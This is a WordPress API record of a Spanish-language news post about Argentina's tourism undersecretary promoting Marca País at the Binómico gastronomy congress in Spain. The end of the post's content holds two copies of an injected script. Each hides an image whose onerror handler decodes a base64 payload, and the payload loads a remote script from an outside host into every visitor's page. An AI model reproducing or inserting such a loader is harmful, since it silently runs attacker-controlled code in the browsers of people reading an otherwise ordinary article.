{"id":1679,"date":"2022-10-26T10:56:21","date_gmt":"2022-10-26T13:56:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1679"},"modified":"2025-08-14T00:32:09","modified_gmt":"2025-08-14T03:32:09","slug":"marca-pais-se-posiciona-en-la-ii-edicion-de-binomico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1679","title":{"rendered":"Marca Pa\u00eds se posiciona en la II Edici\u00f3n de Bin\u00f3mico"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#443202\"><em>La Argentina es pa\u00eds invitado en el Congreso que se desarrolla en Espa\u00f1a.<\/em><\/h3>\n\n\n\n<p>La subsecretaria de Promoci\u00f3n Tur\u00edstica,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>, lleva adelante una agenda de trabajo en el marco del II Congreso \u00abBin\u00f3mico\u00bb Gastron\u00f3mico Iberoamericano, en Espa\u00f1a, con el objetivo de seguir avanzando en el posicionamiento de Marca Pa\u00eds.<\/p>\n\n\n\n<p><em>\u201cLa participaci\u00f3n especial de nuestro pa\u00eds implica la posibilidad de visibilizar, apoyar y promover las diferentes cocinas, que constituyen el patrimonio cultural alimentario, la base de nuestra identidad en cada localidad\u201d<\/em>, asegur\u00f3&nbsp;<strong>Mart\u00ednez<\/strong>, quien tambi\u00e9n expuso en la mesa redonda \u201cTurismo gastron\u00f3mico como motor de desarrollo local\u201d.<\/p>\n\n\n\n<p>En la antesala del Congreso, la funcionaria mantuvo encuentro con la directora general de Internacionalizaci\u00f3n de la Empresa, Elisa Carbonell; y la directora de Cooperaci\u00f3n Institucional y Empresarial, Marta Valero, autoridades de Marca Pa\u00eds Espa\u00f1a, para abordar ejes para el trabajo conjunto vinculados a la&nbsp;<strong>econom\u00eda del conocimiento, la gastronom\u00eda y la moda<\/strong>, entre otros.<\/p>\n\n\n\n<p><em>\u00abSeguimos trabajando en el marco del Plan Estrat\u00e9gico de Marca Pa\u00eds que potencia la labor de los embajadores, promotores de los valores y atributos diferenciales de Argentina\u00bb<\/em>, expres\u00f3&nbsp;<strong>Mart\u00ednez<\/strong>&nbsp;durante la jornada.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img_20221021_084608_768.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La agenda tambi\u00e9n incluy\u00f3 una reuni\u00f3n con Isabel Orozco Carrasco, Manager de Acuerdos Comerciales Institucionales de\u00a0<strong>Iberia<\/strong>, con el fin de avanzar en acciones promocionales con foco en la cultura y el segmento N\u00f3mades Digitales. Y un encuentro con Tania Garc\u00eda Denise, Manager de Relaciones Institucionales de\u00a0<strong>El Corte Ingl\u00e9s<\/strong>, grupo en expansi\u00f3n que cuenta con 3300 agencias a nivel mundial. Conversaron sobre las proyecciones a futuro de Argentina y las posibilidades de trabajo articulado en torno la\u00a0<strong>conectividad, el segmento MICE, la gastronom\u00eda y el f\u00fatbol<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img_20221021_130328_040.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por \u00faltimo, se realizaron distinciones de Marca Pa\u00eds a referentes del f\u00fatbol y la gastronom\u00eda para seguir apoyando el talento argentino.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/whatsapp_image_2022-10-25_at_13.17.28-1024x682.jpeg\" alt=\"\" class=\"wp-image-1680\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/whatsapp_image_2022-10-25_at_13.17.28-1024x682.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/whatsapp_image_2022-10-25_at_13.17.28-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/whatsapp_image_2022-10-25_at_13.17.28-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/whatsapp_image_2022-10-25_at_13.17.28-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/whatsapp_image_2022-10-25_at_13.17.28-1068x712.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/whatsapp_image_2022-10-25_at_13.17.28-630x420.jpeg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/whatsapp_image_2022-10-25_at_13.17.28.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Argentina es pa\u00eds invitado en el Congreso que se desarrolla en Espa\u00f1a. La subsecretaria de Promoci\u00f3n Tur\u00edstica,&nbsp;Yanina Mart\u00ednez, lleva adelante una agenda de trabajo en el marco del II Congreso \u00abBin\u00f3mico\u00bb Gastron\u00f3mico Iberoamericano, en Espa\u00f1a, con el objetivo de seguir avanzando en el posicionamiento de Marca Pa\u00eds. \u201cLa participaci\u00f3n especial de nuestro pa\u00eds implica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1680,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-1679","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1679"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1679"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1679\/revisions"}],"predecessor-version":[{"id":7303,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1679\/revisions\/7303"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1680"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1679"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}